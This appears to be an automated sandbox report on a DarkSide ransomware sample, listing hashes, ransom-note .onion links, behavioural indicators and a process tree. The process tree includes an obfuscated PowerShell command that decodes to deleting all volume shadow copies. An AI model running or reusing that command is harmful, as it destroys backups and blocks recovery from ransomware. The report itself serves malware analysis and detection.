Analysis
-
max time kernel
12s -
max time network
8s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
12-05-2021 17:39
Static task
static1
Behavioral task
behavioral1
Sample
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe
Resource
win10v20210410
General
-
Target
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe
-
Size
226KB
-
MD5
c81dae5c67fb72a2c2f24b178aea50b7
-
SHA1
4bd6437cd1dc77097a7951466531674f80c866c6
-
SHA256
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a
-
SHA512
30d63e080f37f34fb29fd46f8fb1572d79f645154a002c8da5914ae3d51e224bc60601f91f5d58ac2ce9f81d56a8ad467d7fde55d429ed269df3c196e6687b2c
Malware Config
Extracted
C:\\README.2f0839b7.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exedescription ioc process File renamed C:\Users\Admin\Pictures\ExportReceive.tiff => C:\Users\Admin\Pictures\ExportReceive.tiff.2f0839b7 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe File opened for modification C:\Users\Admin\Pictures\ExportReceive.tiff.2f0839b7 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe File renamed C:\Users\Admin\Pictures\MeasureUpdate.tiff => C:\Users\Admin\Pictures\MeasureUpdate.tiff.2f0839b7 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe File opened for modification C:\Users\Admin\Pictures\MeasureUpdate.tiff.2f0839b7 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe File opened for modification C:\Users\Admin\Pictures\UndoRead.tiff 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe File renamed C:\Users\Admin\Pictures\UndoRead.tiff => C:\Users\Admin\Pictures\UndoRead.tiff.2f0839b7 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe File opened for modification C:\Users\Admin\Pictures\ExportReceive.tiff 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe File opened for modification C:\Users\Admin\Pictures\MeasureUpdate.tiff 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe File opened for modification C:\Users\Admin\Pictures\UndoRead.tiff.2f0839b7 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exepid process 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exepowershell.exepid process 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe 1996 powershell.exe 1996 powershell.exe 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeSecurityPrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeTakeOwnershipPrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeLoadDriverPrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeSystemProfilePrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeSystemtimePrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeProfSingleProcessPrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeIncBasePriorityPrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeCreatePagefilePrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeBackupPrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeRestorePrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeShutdownPrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeDebugPrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeSystemEnvironmentPrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeRemoteShutdownPrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeUndockPrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeManageVolumePrivilege 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: 33 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: 34 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: 35 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe Token: SeDebugPrivilege 1996 powershell.exe Token: SeBackupPrivilege 1840 vssvc.exe Token: SeRestorePrivilege 1840 vssvc.exe Token: SeAuditPrivilege 1840 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exedescription pid process target process PID 308 wrote to memory of 1996 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe powershell.exe PID 308 wrote to memory of 1996 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe powershell.exe PID 308 wrote to memory of 1996 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe powershell.exe PID 308 wrote to memory of 1996 308 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe"C:\Users\Admin\AppData\Local\Temp\48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a.exe"1⤵
- Modifies extensions of user files
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1840
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5fe492a5c936af3ff4eb5861800185ff4
SHA1ee474f3d9f18ea49bbb161cf1d123fd01bf753d7
SHA256fbcdb8b4681256a67172244b33e3c1ae98474f31b10ee4fcbe443a97aa880713
SHA512f425cfb4f952e2845e39e79f815d38f11c70533cddd33ab91abdcbaf5c2c0a413e63d352d885e47f90da10d975da75e6bd12fef6505e4adb9b0d75e64ab7d27f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD54ee5687175d64f04d5d9e55b5bf9925b
SHA1557dd2ee974448c22670f74d27f470af6648e415
SHA2567c79032e6674d0cd50a92892aef93696e0e2dc94ef9c13102f30e4081ee8d4e2
SHA51233d2acfb2bbeb92a0d30ccf21eea130ee3b7b292598a21920dc832a0f7b7560ba5fbc0fa49cd3b1225b6cda2a7fd4a0030b99ed9e62f8e5849c6568be6909b92